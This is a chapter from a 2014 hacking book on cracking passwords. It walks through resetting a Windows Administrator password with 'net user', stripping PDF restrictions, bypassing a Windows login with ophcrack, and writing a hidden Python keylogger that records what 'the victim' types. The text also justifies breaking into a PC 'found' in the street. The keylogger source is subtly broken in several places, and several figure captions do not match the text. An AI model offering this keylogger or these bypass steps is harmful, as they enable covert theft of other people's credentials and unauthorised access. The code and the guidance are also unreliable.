Cracking passwords - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)

Chapter 4. Cracking passwords

We will cover:

* Types of passwords

* Basic administrator password reset.

* Crack the encrypted pdf

* Bypass windows password

* Custom made keylogger

Password cracking doesn't have to involve fancy tools, but it's a fairly tedious process. If the target doesn't lock you out after a specific number of tries, you can spend an infinite amount of time trying every combination of alphanumeric characters. It's just a question of time and bandwidth before you break into a system.

Types of passwords

Dictionary- A file of words is run against user accounts, and if the password is a simple word, it can be found pretty quickly.

Hybrid - A common method utilized by users to change passwords is to add a number or symbol to the end. A hybrid attack works like a dictionary attack, but adds simple numbers or symbols to the password attempt.

Brute force - The most time-consuming, but comprehensive way to crack a password. Every combination of character is tried until the password is broken.

Basic administrator password reset

1. Go to Start->open Run-> then write cmd. Or Start->And search for command prompt then enter.

2. To view the available user see Figure 4-1)inside the operating system type in:

net user

In Figure 4-1 . Here shows you the users inside the computer in cmd

3. Now type :

net user Administrator *

you write net user again and the administrator account this time its Administrator

4. After then type in the new password twice. After then it should be okay for you to enter the administrator account with the new password.

Cracking the encrypted PDF

Removing passwords from pdf files can be sometimes frustrating especially when you lost a password or you found it free somewhere. A-PDF Restrictions Remover is a great tool for cracking the password. It is free to download and can be found in Google (If you enter the exact name) (seeFigure 4-2)

In Figure 4-2 .shows you how A-PDF Restriction is looking when its running

1. When you download and install A-PDF Restrictions Remover, you should be able to right click the restricted pdf file and choose “Remove Restrictions” or “Remove Restriction & Save as..”

Bypass windows Password

Bypassing the windows password has become one of the most common things in the IT industry and in the normal life, maybe it is because you lost your password or you found the PC for free thrown in the streets and you need the password to proceed in the computer.

Here I will show you a way to bypass windows password using a USB stick or CD.

1. Go to this link: http://ophcrack.sourceforge.net/download.php and download ophcrack LiveCD-> Burn the iso.

2. Reboot the computer and boot it from the cd an choose Ophcrack LiveCD Graphics mode(automode) (see Figure 4-2)

In Figure 4-2 .shows you Ophcrack LiveCD running from the cd or stick.

When it loads and open, it will ask you which partition to open. Type 0

4. Wait for a moment and the cracked password will appear next to the protected user(see Figure 4-3)

In Figure 4-3 .shows you how backtrack will look like while searching for packets

Custom Made Keylogger

Keylogger doesn’t actually crack a password but it monitors what passwords the victim is typing. Let’s see how to program a keylogger.

1. Start navigating to python.org. There in the download section download the latest version of python. (see Figure 5-8)

In Figure 5-8 .shows you how the script is running in the terminal.

2. Once it finished downloading go to: http://sourceforge.net/projects/pyhook/files/

Download the latest version. Now install it.

3. Now navigate to : www.sourceforge.net/projects/pywin32 and download it and give it a install.

Note: All of these tools are needed to be in the same version. In order for them to work properly. My hook 1.5x requires python 2.7

4. Now launch the IDLE(Python GUI) by searching the name in
start and the python shell will launch itself.

5. Type in those python code inside the app:

import win32api

import win32console

import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()

win32gui.ShowWindows(win,0)

def OnKeyboardEvent(event):

if event.Ascii==5:

_exit(1)

if event.Ascii != 0 or 8:

f=open(‘c:\output.txt’,’w’)

buffer=f.read()

f.close()

f=open(‘c:\output.txt’,’w’)

keylogs=chr(event.Ascii)

if event.Ascii==13:

keylogs=’/n’

buffer += keylogs

f.write(buffer)

f.close()

hm = pyHook.HookManager()

hm.KeyDown = OnKeyboardEvent

hm.HookKeyboard()

pythoncom.PumpMessages()

6. Save the file as my_own_keylogger.py and launch it

7. Now that your made-software is running, you can start testing it by going to your email account or any other account and enter your username and password.

8. When you think you have enough information press Ctrl+I to stop the app

9. Go to the output.txt file and examine it to see what you retrieved.

Note: In our case we saved the output.txt in the C drive root folder.

Small summary ahead

* A-PDF Restictions Remover is a tool for cracking password of PDF

* Ophcrack is best software used to bypass the windows password

* There are three types of password cracking Dictionary,Hybrid,Brute Force.

* A keylogger can be custom made using python